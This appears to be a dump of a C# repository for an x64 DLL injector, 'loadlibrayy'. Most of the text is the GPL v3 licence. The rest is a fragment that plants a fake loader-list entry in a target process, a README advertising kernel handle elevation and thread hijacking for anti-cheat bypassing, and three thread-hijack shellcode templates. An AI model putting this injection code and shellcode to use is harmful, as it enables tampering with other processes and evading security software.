(ulong)MappedRawImages[imageName].Length, FullDllName = new NT.UNICODE_STRING(imagePath) { Buffer = allocatedDllPath }, BaseDllName = new NT.UNICODE_STRING(fileName) { Buffer = allocatedDllPath + (ulong)imagePath.IndexOf(fileName) * 2/*WIDE CHAR*/ }, Flags = lastEntry.Flags, LoadCount = lastEntry.LoadCount, TlsIndex = lastEntry.TlsIndex, Reserved4 = lastEntry.Reserved4, CheckSum = lastEntry.CheckSum, TimeDateStamp = lastEntry.TimeDateStamp, EntryPointActivationContext = lastEntry.EntryPointActivationContext, PatchInformation = lastEntry.PatchInformation, ForwarderLinks = lastEntry.ForwarderLinks, ServiceTagLinks = lastEntry.ServiceTagLinks, StaticLinks = lastEntry.StaticLinks, }; // ALLOCATE AND WRITE OUR MODULE ENTRY var newEntryPointer = TargetProcess.AllocateAndWrite(Tools.GetBytes(myEntry), NT.AllocationType.Commit, NT.MemoryProtection.ExecuteReadWrite); // SET LAST LINK IN InLoadOrderLinks CHAIN TO POINT TO OUR ENTRY lastEntry.InLoadOrderLinks.Flink = newEntryPointer; TargetProcess.Write(lastEntry, listBase.Blink); } #endregion } } ================================================ FILE: LICENSE ================================================ GNU GENERAL PUBLIC LICENSE Version 3, 29 June 2007 Copyright (C) 2007 Free Software Foundation, Inc. Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The GNU General Public License is a free, copyleft license for software and other kinds of works. The licenses for most software and other practical works are designed to take away your freedom to share and change the works. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change all versions of a program--to make sure it remains free software for all its users. We, the Free Software Foundation, use the GNU General Public License for most of our software; it applies also to any other work released this way by its authors. You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for them if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs, and that you know you can do these things. To protect your rights, we need to prevent others from denying you these rights or asking you to surrender the rights. Therefore, you have certain responsibilities if you distribute copies of the software, or if you modify it: responsibilities to respect the freedom of others. For example, if you distribute copies of such a program, whether gratis or for a fee, you must pass on to the recipients the same freedoms that you received. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. Developers that use the GNU GPL protect your rights with two steps: (1) assert copyright on the software, and (2) offer you this License giving you legal permission to copy, distribute and/or modify it. For the developers' and authors' protection, the GPL clearly explains that there is no warranty for this free software. For both users' and authors' sake, the GPL requires that modified versions be marked as changed, so that their problems will not be attributed erroneously to authors of previous versions. Some devices are designed to deny users access to install or run modified versions of the software inside them, although the manufacturer can do so. This is fundamentally incompatible with the aim of protecting users' freedom to change the software. The systematic pattern of such abuse occurs in the area of products for individuals to use, which is precisely where it is most unacceptable. Therefore, we have designed this version of the GPL to prohibit the practice for those products. If such problems arise substantially in other domains, we stand ready to extend this provision to those domains in future versions of the GPL, as needed to protect the freedom of users. Finally, every program is threatened constantly by software patents. States should not allow patents to restrict development and use of software on general-purpose computers, but in those that do, we wish to avoid the special danger that patents applied to a free program could make it effectively proprietary. To prevent this, the GPL assures that patents cannot be used to render the program non-free. The precise terms and conditions for copying, distribution and modification follow. TERMS AND CONDITIONS 0. Definitions. "This License" refers to version 3 of the GNU General Public License. "Copyright" also means copyright-like laws that apply to other kinds of works, such as semiconductor masks. "The Program" refers to any copyrightable work licensed under this License. Each licensee is addressed as "you". "Licensees" and "recipients" may be individuals or organizations. To "modify" a work means to copy from or adapt all or part of the work in a fashion requiring copyright permission, other than the making of an exact copy. The resulting work is called a "modified version" of the earlier work or a work "based on" the earlier work. A "covered work" means either the unmodified Program or a work based on the Program. To "propagate" a work means to do anything with it that, without permission, would make you directly or secondarily liable for infringement under applicable copyright law, except executing it on a computer or modifying a private copy. Propagation includes copying, distribution (with or without modification), making available to the public, and in some countries other activities as well. To "convey" a work means any kind of propagation that enables other parties to make or receive copies. Mere interaction with a user through a computer network, with no transfer of a copy, is not conveying. An interactive user interface displays "Appropriate Legal Notices" to the extent that it includes a convenient and prominently visible feature that (1) displays an appropriate copyright notice, and (2) tells the user that there is no warranty for the work (except to the extent that warranties are provided), that licensees may convey the work under this License, and how to view a copy of this License. If the interface presents a list of user commands or options, such as a menu, a prominent item in the list meets this criterion. 1. Source Code. The "source code" for a work means the preferred form of the work for making modifications to it. "Object code" means any non-source form of a work. A "Standard Interface" means an interface that either is an official standard defined by a recognized standards body, or, in the case of interfaces specified for a particular programming language, one that is widely used among developers working in that language. The "System Libraries" of an executable work include anything, other than the work as a whole, that (a) is included in the normal form of packaging a Major Component, but which is not part of that Major Component, and (b) serves only to enable use of the work with that Major Component, or to implement a Standard Interface for which an implementation is available to the public in source code form. A "Major Component", in this context, means a major essential component (kernel, window system, and so on) of the specific operating system (if any) on which the executable work runs, or a compiler used to produce the work, or an object code interpreter used to run it. The "Corresponding Source" for a work in object code form means all the source code needed to generate, install, and (for an executable work) run the object code and to modify the work, including scripts to control those activities. However, it does not include the work's System Libraries, or general-purpose tools or generally available free programs which are used unmodified in performing those activities but which are not part of the work. For example, Corresponding Source includes interface definition files associated with source files for the work, and the source code for shared libraries and dynamically linked subprograms that the work is specifically designed to require, such as by intimate data communication or control flow between those subprograms and other parts of the work. The Corresponding Source need not include anything that users can regenerate automatically from other parts of the Corresponding Source. The Corresponding Source for a work in source code form is that same work. 2. Basic Permissions. All rights granted under this License are granted for the term of copyright on the Program, and are irrevocable provided the stated conditions are met. This License explicitly affirms your unlimited permission to run the unmodified Program. The output from running a covered work is covered by this License only if the output, given its content, constitutes a covered work. This License acknowledges your rights of fair use or other equivalent, as provided by copyright law. You may make, run and propagate covered works that you do not convey, without conditions so long as your license otherwise remains in force. You may convey covered works to others for the sole purpose of having them make modifications exclusively for you, or provide you with facilities for running those works, provided that you comply with the terms of this License in conveying all material for which you do not control copyright. Those thus making or running the covered works for you must do so exclusively on your behalf, under your direction and control, on terms that prohibit them from making any copies of your copyrighted material outside their relationship with you. Conveying under any other circumstances is permitted solely under the conditions stated below. Sublicensing is not allowed; section 10 makes it unnecessary. 3. Protecting Users' Legal Rights From Anti-Circumvention Law. No covered work shall be deemed part of an effective technological measure under any applicable law fulfilling obligations under article 11 of the WIPO copyright treaty adopted on 20 December 1996, or similar laws prohibiting or restricting circumvention of such measures. When you convey a covered work, you waive any legal power to forbid circumvention of technological measures to the extent such circumvention is effected by exercising rights under this License with respect to the covered work, and you disclaim any intention to limit operation or modification of the work as a means of enforcing, against the work's users, your or third parties' legal rights to forbid circumvention of technological measures. 4. Conveying Verbatim Copies. You may convey verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice; keep intact all notices stating that this License and any non-permissive terms added in accord with section 7 apply to the code; keep intact all notices of the absence of any warranty; and give all recipients a copy of this License along with the Program. You may charge any price or no price for each copy that you convey, and you may offer support or warranty protection for a fee. 5. Conveying Modified Source Versions. You may convey a work based on the Program, or the modifications to produce it from the Program, in the form of source code under the terms of section 4, provided that you also meet all of these conditions: a) The work must carry prominent notices stating that you modified it, and giving a relevant date. b) The work must carry prominent notices stating that it is released under this License and any conditions added under section 7. This requirement modifies the requirement in section 4 to "keep intact all notices". c) You must license the entire work, as a whole, under this License to anyone who comes into possession of a copy. This License will therefore apply, along with any applicable section 7 additional terms, to the whole of the work, and all its parts, regardless of how they are packaged. This License gives no permission to license the work in any other way, but it does not invalidate such permission if you have separately received it. d) If the work has interactive user interfaces, each must display Appropriate Legal Notices; however, if the Program has interactive interfaces that do not display Appropriate Legal Notices, your work need not make them do so. A compilation of a covered work with other separate and independent works, which are not by their nature extensions of the covered work, and which are not combined with it such as to form a larger program, in or on a volume of a storage or distribution medium, is called an "aggregate" if the compilation and its resulting copyright are not used to limit the access or legal rights of the compilation's users beyond what the individual works permit. Inclusion of a covered work in an aggregate does not cause this License to apply to the other parts of the aggregate. 6. Conveying Non-Source Forms. You may convey a covered work in object code form under the terms of sections 4 and 5, provided that you also convey the machine-readable Corresponding Source under the terms of this License, in one of these ways: a) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by the Corresponding Source fixed on a durable physical medium customarily used for software interchange. b) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by a written offer, valid for at least three years and valid for as long as you offer spare parts or customer support for that product model, to give anyone who possesses the object code either (1) a copy of the Corresponding Source for all the software in the product that is covered by this License, on a durable physical medium customarily used for software interchange, for a price no more than your reasonable cost of physically performing this conveying of source, or (2) access to copy the Corresponding Source from a network server at no charge. c) Convey individual copies of the object code with a copy of the written offer to provide the Corresponding Source. This alternative is allowed only occasionally and noncommercially, and only if you received the object code with such an offer, in accord with subsection 6b. d) Convey the object code by offering access from a designated place (gratis or for a charge), and offer equivalent access to the Corresponding Source in the same way through the same place at no further charge. You need not require recipients to copy the Corresponding Source along with the object code. If the place to copy the object code is a network server, the Corresponding Source may be on a different server (operated by you or a third party) that supports equivalent copying facilities, provided you maintain clear directions next to the object code saying where to find the Corresponding Source. Regardless of what server hosts the Corresponding Source, you remain obligated to ensure that it is available for as long as needed to satisfy these requirements. e) Convey the object code using peer-to-peer transmission, provided you inform other peers where the object code and Corresponding Source of the work are being offered to the general public at no charge under subsection 6d. A separable portion of the object code, whose source code is excluded from the Corresponding Source as a System Library, need not be included in conveying the object code work. A "User Product" is either (1) a "consumer product", which means any tangible personal property which is normally used for personal, family, or household purposes, or (2) anything designed or sold for incorporation into a dwelling. In determining whether a product is a consumer product, doubtful cases shall be resolved in favor of coverage. For a particular product received by a particular user, "normally used" refers to a typical or common use of that class of product, regardless of the status of the particular user or of the way in which the particular user actually uses, or expects or is expected to use, the product. A product is a consumer product regardless of whether the product has substantial commercial, industrial or non-consumer uses, unless such uses represent the only significant mode of use of the product. "Installation Information" for a User Product means any methods, procedures, authorization keys, or other information required to install and execute modified versions of a covered work in that User Product from a modified version of its Corresponding Source. The information must suffice to ensure that the continued functioning of the modified object code is in no case prevented or interfered with solely because modification has been made. If you convey an object code work under this section in, or with, or specifically for use in, a User Product, and the conveying occurs as part of a transaction in which the right of possession and use of the User Product is transferred to the recipient in perpetuity or for a fixed term (regardless of how the transaction is characterized), the Corresponding Source conveyed under this section must be accompanied by the Installation Information. But this requirement does not apply if neither you nor any third party retains the ability to install modified object code on the User Product (for example, the work has been installed in ROM). The requirement to provide Installation Information does not include a requirement to continue to provide support service, warranty, or updates for a work that has been modified or installed by the recipient, or for the User Product in which it has been modified or installed. Access to a network may be denied when the modification itself materially and adversely affects the operation of the network or violates the rules and protocols for communication across the network. Corresponding Source conveyed, and Installation Information provided, in accord with this section must be in a format that is publicly documented (and with an implementation available to the public in source code form), and must require no special password or key for unpacking, reading or copying. 7. Additional Terms. "Additional permissions" are terms that supplement the terms of this License by making exceptions from one or more of its conditions. Additional permissions that are applicable to the entire Program shall be treated as though they were included in this License, to the extent that they are valid under applicable law. If additional permissions apply only to part of the Program, that part may be used separately under those permissions, but the entire Program remains governed by this License without regard to the additional permissions. When you convey a copy of a covered work, you may at your option remove any additional permissions from that copy, or from any part of it. (Additional permissions may be written to require their own removal in certain cases when you modify the work.) You may place additional permissions on material, added by you to a covered work, for which you have or can give appropriate copyright permission. Notwithstanding any other provision of this License, for material you add to a covered work, you may (if authorized by the copyright holders of that material) supplement the terms of this License with terms: a) Disclaiming warranty or limiting liability differently from the terms of sections 15 and 16 of this License; or b) Requiring preservation of specified reasonable legal notices or author attributions in that material or in the Appropriate Legal Notices displayed by works containing it; or c) Prohibiting misrepresentation of the origin of that material, or requiring that modified versions of such material be marked in reasonable ways as different from the original version; or d) Limiting the use for publicity purposes of names of licensors or authors of the material; or e) Declining to grant rights under trademark law for use of some trade names, trademarks, or service marks; or f) Requiring indemnification of licensors and authors of that material by anyone who conveys the material (or modified versions of it) with contractual assumptions of liability to the recipient, for any liability that these contractual assumptions directly impose on those licensors and authors. All other non-permissive additional terms are considered "further restrictions" within the meaning of section 10. If the Program as you received it, or any part of it, contains a notice stating that it is governed by this License along with a term that is a further restriction, you may remove that term. If a license document contains a further restriction but permits relicensing or conveying under this License, you may add to a covered work material governed by the terms of that license document, provided that the further restriction does not survive such relicensing or conveying. If you add terms to a covered work in accord with this section, you must place, in the relevant source files, a statement of the additional terms that apply to those files, or a notice indicating where to find the applicable terms. Additional terms, permissive or non-permissive, may be stated in the form of a separately written license, or stated as exceptions; the above requirements apply either way. 8. Termination. You may not propagate or modify a covered work except as expressly provided under this License. Any attempt otherwise to propagate or modify it is void, and will automatically terminate your rights under this License (including any patent licenses granted under the third paragraph of section 11). However, if you cease all violation of this License, then your license from a particular copyright holder is reinstated (a) provisionally, unless and until the copyright holder explicitly and finally terminates your license, and (b) permanently, if the copyright holder fails to notify you of the violation by some reasonable means prior to 60 days after the cessation. Moreover, your license from a particular copyright holder is reinstated permanently if the copyright holder notifies you of the violation by some reasonable means, this is the first time you have received notice of violation of this License (for any work) from that copyright holder, and you cure the violation prior to 30 days after your receipt of the notice. Termination of your rights under this section does not terminate the licenses of parties who have received copies or rights from you under this License. If your rights have been terminated and not permanently reinstated, you do not qualify to receive new licenses for the same material under section 10. 9. Acceptance Not Required for Having Copies. You are not required to accept this License in order to receive or run a copy of the Program. Ancillary propagation of a covered work occurring solely as a consequence of using peer-to-peer transmission to receive a copy likewise does not require acceptance. However, nothing other than this License grants you permission to propagate or modify any covered work. These actions infringe copyright if you do not accept this License. Therefore, by modifying or propagating a covered work, you indicate your acceptance of this License to do so. 10. Automatic Licensing of Downstream Recipients. Each time you convey a covered work, the recipient automatically receives a license from the original licensors, to run, modify and propagate that work, subject to this License. You are not responsible for enforcing compliance by third parties with this License. An "entity transaction" is a transaction transferring control of an organization, or substantially all assets of one, or subdividing an organization, or merging organizations. If propagation of a covered work results from an entity transaction, each party to that transaction who receives a copy of the work also receives whatever licenses to the work the party's predecessor in interest had or could give under the previous paragraph, plus a right to possession of the Corresponding Source of the work from the predecessor in interest, if the predecessor has it or can get it with reasonable efforts. You may not impose any further restrictions on the exercise of the rights granted or affirmed under this License. For example, you may not impose a license fee, royalty, or other charge for exercise of rights granted under this License, and you may not initiate litigation (including a cross-claim or counterclaim in a lawsuit) alleging that any patent claim is infringed by making, using, selling, offering for sale, or importing the Program or any portion of it. 11. Patents. A "contributor" is a copyright holder who authorizes use under this License of the Program or a work on which the Program is based. The work thus licensed is called the contributor's "contributor version". A contributor's "essential patent claims" are all patent claims owned or controlled by the contributor, whether already acquired or hereafter acquired, that would be infringed by some manner, permitted by this License, of making, using, or selling its contributor version, but do not include claims that would be infringed only as a consequence of further modification of the contributor version. For purposes of this definition, "control" includes the right to grant patent sublicenses in a manner consistent with the requirements of this License. Each contributor grants you a non-exclusive, worldwide, royalty-free patent license under the contributor's essential patent claims, to make, use, sell, offer for sale, import and otherwise run, modify and propagate the contents of its contributor version. In the following three paragraphs, a "patent license" is any express agreement or commitment, however denominated, not to enforce a patent (such as an express permission to practice a patent or covenant not to sue for patent infringement). To "grant" such a patent license to a party means to make such an agreement or commitment not to enforce a patent against the party. If you convey a covered work, knowingly relying on a patent license, and the Corresponding Source of the work is not available for anyone to copy, free of charge and under the terms of this License, through a publicly available network server or other readily accessible means, then you must either (1) cause the Corresponding Source to be so available, or (2) arrange to deprive yourself of the benefit of the patent license for this particular work, or (3) arrange, in a manner consistent with the requirements of this License, to extend the patent license to downstream recipients. "Knowingly relying" means you have actual knowledge that, but for the patent license, your conveying the covered work in a country, or your recipient's use of the covered work in a country, would infringe one or more identifiable patents in that country that you have reason to believe are valid. If, pursuant to or in connection with a single transaction or arrangement, you convey, or propagate by procuring conveyance of, a covered work, and grant a patent license to some of the parties receiving the covered work authorizing them to use, propagate, modify or convey a specific copy of the covered work, then the patent license you grant is automatically extended to all recipients of the covered work and works based on it. A patent license is "discriminatory" if it does not include within the scope of its coverage, prohibits the exercise of, or is conditioned on the non-exercise of one or more of the rights that are specifically granted under this License. You may not convey a covered work if you are a party to an arrangement with a third party that is in the business of distributing software, under which you make payment to the third party based on the extent of your activity of conveying the work, and under which the third party grants, to any of the parties who would receive the covered work from you, a discriminatory patent license (a) in connection with copies of the covered work conveyed by you (or copies made from those copies), or (b) primarily for and in connection with specific products or compilations that contain the covered work, unless you entered into that arrangement, or that patent license was granted, prior to 28 March 2007. Nothing in this License shall be construed as excluding or limiting any implied license or other defenses to infringement that may otherwise be available to you under applicable patent law. 12. No Surrender of Others' Freedom. If conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot convey a covered work so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not convey it at all. For example, if you agree to terms that obligate you to collect a royalty for further conveying from those to whom you convey the Program, the only way you could satisfy both those terms and this License would be to refrain entirely from conveying the Program. 13. Use with the GNU Affero General Public License. Notwithstanding any other provision of this License, you have permission to link or combine any covered work with a work licensed under version 3 of the GNU Affero General Public License into a single combined work, and to convey the resulting work. The terms of this License will continue to apply to the part which is the covered work, but the special requirements of the GNU Affero General Public License, section 13, concerning interaction through a network will apply to the combination as such. 14. Revised Versions of this License. The Free Software Foundation may publish revised and/or new versions of the GNU General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies that a certain numbered version of the GNU General Public License "or any later version" applies to it, you have the option of following the terms and conditions either of that numbered version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of the GNU General Public License, you may choose any version ever published by the Free Software Foundation. If the Program specifies that a proxy can decide which future versions of the GNU General Public License can be used, that proxy's public statement of acceptance of a version permanently authorizes you to choose that version for the Program. Later license versions may give you additional or different permissions. However, no additional obligations are imposed on any author or copyright holder as a result of your choosing to follow a later version. 15. Disclaimer of Warranty. THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 16. Limitation of Liability. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 17. Interpretation of Sections 15 and 16. If the disclaimer of warranty and limitation of liability provided above cannot be given local legal effect according to their terms, reviewing courts shall apply local law that most closely approximates an absolute waiver of all civil liability in connection with the Program, unless a warranty or assumption of liability accompanies a copy of the Program in return for a fee. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively state the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . Also add information on how to contact you by electronic and paper mail. If the program does terminal interaction, make it output a short notice like this when it starts in an interactive mode: Copyright (C) This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, your program's commands might be different; for a GUI interface, you would use an "about box". You should also get your employer (if you work as a programmer) or school, if any, to sign a "copyright disclaimer" for the program, if necessary. For more information on this, and how to apply and follow the GNU GPL, see . The GNU General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. But first, please read . ================================================ FILE: Loadlibrayy.csproj ================================================  Debug AnyCPU {D35BB6BE-80A3-4983-A9EC-DC51B1B36E12} Exe Properties Loadlibrayy Loadlibrayy v4.7 512 true AnyCPU true full false bin\Debug\ DEBUG;TRACE prompt 4 true false AnyCPU pdbonly true bin\Release\ TRACE prompt 4 true false Miscellaneous\app.manifest packages\System.Runtime.CompilerServices.Unsafe.4.3.0\lib\netstandard1.0\System.Runtime.CompilerServices.Unsafe.dll Form NewInjectionForm.cs Form TaskList.cs Form DankInjectionForm.cs DankInjectionForm.cs NewInjectionForm.cs TaskList.cs ResXFileCodeGenerator Resources.Designer.cs Designer True Resources.resx True SettingsSingleFileGenerator Settings.Designer.cs True Settings.settings True ================================================ FILE: Miscellaneous/Program.cs ================================================ using System; using System.Collections.Generic; using System.Linq; using System.Net; using System.Reflection; using System.Threading.Tasks; using System.Windows.Forms; using Loadlibrayy.Forms; namespace Loadlibrayy { static class Program { /// /// The main entry point for the application. /// [STAThread] static void Main() { Application.EnableVisualStyles(); Application.SetCompatibleTextRenderingDefault(false); Application.Run(new /*Dank*/NewInjectionForm()); } } } ================================================ FILE: Miscellaneous/app.manifest ================================================  ================================================ FILE: Properties/AssemblyInfo.cs ================================================ using System.Reflection; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; // General Information about an assembly is controlled through the following // set of attributes. Change these attribute values to modify the information // associated with an assembly. [assembly: AssemblyTitle("loadlibrayy")] [assembly: AssemblyDescription("")] [assembly: AssemblyConfiguration("")] [assembly: AssemblyCompany("")] [assembly: AssemblyProduct("loadlibrayy")] [assembly: AssemblyCopyright("Copyright © 2017")] [assembly: AssemblyTrademark("")] [assembly: AssemblyCulture("")] // Setting ComVisible to false makes the types in this assembly not visible // to COM components. If you need to access a type in this assembly from // COM, set the ComVisible attribute to true on that type. [assembly: ComVisible(false)] // The following GUID is for the ID of the typelib if this project is exposed to COM [assembly: Guid("d35bb6be-80a3-4983-a9ec-dc51b1b36e12")] // Version information for an assembly consists of the following four values: // // Major Version // Minor Version // Build Number // Revision // // You can specify all the values or you can default the Build and Revision Numbers // by using the '*' as shown below: // [assembly: AssemblyVersion("1.0.*")] [assembly: AssemblyVersion("1.0.0.0")] [assembly: AssemblyFileVersion("1.0.0.0")] ================================================ FILE: Properties/Resources.Designer.cs ================================================ //------------------------------------------------------------------------------ // // This code was generated by a tool. // Runtime Version:4.0.30319.42000 // // Changes to this file may cause incorrect behavior and will be lost if // the code is regenerated. // //------------------------------------------------------------------------------ namespace Loadlibrayy.Properties { using System; /// /// A strongly-typed resource class, for looking up localized strings, etc. /// // This class was auto-generated by the StronglyTypedResourceBuilder // class via a tool like ResGen or Visual Studio. // To add or remove a member, edit your .ResX file then rerun ResGen // with the /str option, or rebuild your VS project. [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")] [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] internal class Resources { private static global::System.Resources.ResourceManager resourceMan; private static global::System.Globalization.CultureInfo resourceCulture; [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")] internal Resources() { } /// /// Returns the cached ResourceManager instance used by this class. /// [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] internal static global::System.Resources.ResourceManager ResourceManager { get { if (object.ReferenceEquals(resourceMan, null)) { global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Loadlibrayy.Properties.Resources", typeof(Resources).Assembly); resourceMan = temp; } return resourceMan; } } /// /// Overrides the current thread's CurrentUICulture property for all /// resource lookups using this strongly typed resource class. /// [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] internal static global::System.Globalization.CultureInfo Culture { get { return resourceCulture; } set { resourceCulture = value; } } /// /// Looks up a localized resource of type System.Drawing.Bitmap. /// internal static System.Drawing.Bitmap ayylmao { get { object obj = ResourceManager.GetObject("ayylmao", resourceCulture); return ((System.Drawing.Bitmap)(obj)); } } /// /// Looks up a localized resource of type System.Drawing.Bitmap. /// internal static System.Drawing.Bitmap ayylmao2 { get { object obj = ResourceManager.GetObject("ayylmao2", resourceCulture); return ((System.Drawing.Bitmap)(obj)); } } /// /// Looks up a localized resource of type System.IO.UnmanagedMemoryStream similar to System.IO.MemoryStream. /// internal static System.IO.UnmanagedMemoryStream Hey_Everybody__Im_looking_at_gay_porno_ { get { return ResourceManager.GetStream("Hey_Everybody__Im_looking_at_gay_porno_", resourceCulture); } } /// /// Looks up a localized resource of type System.IO.UnmanagedMemoryStream similar to System.IO.MemoryStream. /// internal static System.IO.UnmanagedMemoryStream photonsound { get { return ResourceManager.GetStream("photonsound", resourceCulture); } } /// /// Looks up a localized resource of type System.IO.UnmanagedMemoryStream similar to System.IO.MemoryStream. /// internal static System.IO.UnmanagedMemoryStream windows_xp_shutdown { get { return ResourceManager.GetStream("windows_xp_shutdown", resourceCulture); } } } } ================================================ FILE: Properties/Resources.resx ================================================  text/microsoft-resx 2.0 System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 ..\Resources\6ca.jpg;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a ..\Resources\eac04ecf056b02b.wav;System.IO.MemoryStream, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 ..\Resources\windows_xp_shutdown.wav;System.IO.MemoryStream, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 ..\Resources\6ca - Copy.jpg;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a ..\Resources\Hey Everybody. Im looking at gay porno!.wav;System.IO.MemoryStream, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 ================================================ FILE: Properties/Settings.Designer.cs ================================================ //------------------------------------------------------------------------------ // // This code was generated by a tool. // Runtime Version:4.0.30319.42000 // // Changes to this file may cause incorrect behavior and will be lost if // the code is regenerated. // //------------------------------------------------------------------------------ namespace Loadlibrayy.Properties { [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "14.0.0.0")] internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase { private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings()))); public static Settings Default { get { return defaultInstance; } } } } ================================================ FILE: Properties/Settings.settings ================================================  ================================================ FILE: README.md ================================================ # loadlibrayy x64 PE injector with kernel handle elevation and thread hijacking capabilities ## Features + Standard manualmapping (Fix imports, relocate image) + Standard remote load library + Elevate handles through direct kernel object manipulation + DllMain / Loadlibrary thread hijacking capabilities for all your anticheat bypassing needs ## Thanks + MarkHC + DarthTon for his BlackBone project + JD96 (Ch40zz) # Screenshot ![Menu](http://i.imgur.com/qS1iPT7.png) ================================================ FILE: Shellcodes/call_dllmain_x64.asm ================================================ sub RSP, 0x28 movabs RCX, 0x0000000000000000 ; hModule mov RDX, 0x1 ; fdwReason xor R8, R8 ; lpvReserved movabs RAX, 0x0000000000000000 ; DllMain Address call RAX add RSP, 0x28 ret ================================================ FILE: Shellcodes/threadhijack_dllmain_x64.asm ================================================ PUSHFQ PUSH rax PUSH rbx PUSH rcx PUSH rdx PUSH r8 PUSH r9 PUSH r10 PUSH r11 sub RSP, 0x28 movabs RCX, 0x0000000000000000 ; hModule mov RDX, 0x1 ; fdwReason xor R8, R8 ; lpvReserved movabs RAX, 0x0000000000000000 ; DllMain Address call RAX add RSP, 0x28 POP r11 POP r10 POP r9 POP r8 POP rdx POP rcx POP rbx POP rax POPFQ ret ================================================ FILE: Shellcodes/threadhijack_loadlibrary_x64.asm ================================================ PUSHFQ PUSH rax PUSH rbx PUSH rcx PUSH rdx PUSH r8 PUSH r9 PUSH r10 PUSH r11 sub RSP, 0x28 movabs RCX, 0x0000000000000000 ; Image path movabs RAX, 0x0000000000000000 ; Pointer to LoadLibrary call RAX add RSP, 0x28 POP r11 POP r10 POP r9 POP r8 POP rdx POP rcx POP rbx POP rax POPFQ ret ================================================ FILE: loadlibrayy.sln ================================================  Microsoft Visual Studio Solution File, Format Version 12.00 # Visual Studio 15 VisualStudioVersion = 15.0.26430.15 MinimumVisualStudioVersion = 10.0.40219.1 